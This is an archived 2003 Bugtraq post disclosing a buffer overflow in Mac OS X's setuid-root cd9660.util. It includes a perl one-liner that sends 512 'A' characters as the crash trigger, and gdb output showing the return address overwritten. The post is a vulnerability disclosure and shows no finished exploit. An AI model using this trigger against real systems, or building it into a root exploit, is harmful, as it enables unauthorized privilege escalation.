Buffer overflow/privilege escalation in MacOS X

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Buffer overflow/privilege escalation in MacOS X
From: Max <rusmir@xxxxxxxx>
Date: Mon, 15 Dec 2003 11:54:02 -0800
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: Max <rusmir@xxxxxxxx>

Hi,

It appears that parts of MacOSX that didn't come from BSD are
not very well written and have significant security issues.

An example is a /System/Library/Filesystems/cd9660.fs/cd9660.util
utility. It is suid root and it is vulnerable to a classic buffer
overflow due to the lack of input validation.

Demonstration:

sdsx:/System/Library/Filesystems/cd9660.fs max$ ls -la cd9660.util
-rwsr-xr-x  1 root  wheel  20476 23 Sep 23:53 cd9660.util

sdsx:/System/Library/Filesystems/cd9660.fs max$ ./cd9660.util -p `perl -e 
"print 'A'x512"`
Segmentation fault

sdsx:/System/Library/Filesystems/cd9660.fs root# gdb -core /cores/core.1405 
./cd9660.util
[gdb banner here]
Reading symbols for shared libraries .... done
Core was generated by `./cd9660.util'.
#0  0x9000d360 in strcat ()
(gdb) where
#0  0x9000d360 in strcat ()
#1  0x00002b84 in main ()
#2  0x41414141 in ?? ()



Thanks,

Max.

Follow-Ups:
- Re: Buffer overflow/privilege escalation in MacOS X
  - From: David Riley

Prev by Date: GLSA: Malformed dcc send requests in xchat-2.0.6 lead to a denial of service
Next by Date: lftp buffer overflows
Previous by thread: GLSA: Malformed dcc send requests in xchat-2.0.6 lead to a denial of service
Next by thread: Re: Buffer overflow/privilege escalation in MacOS X
Index(es):
- Date
- Thread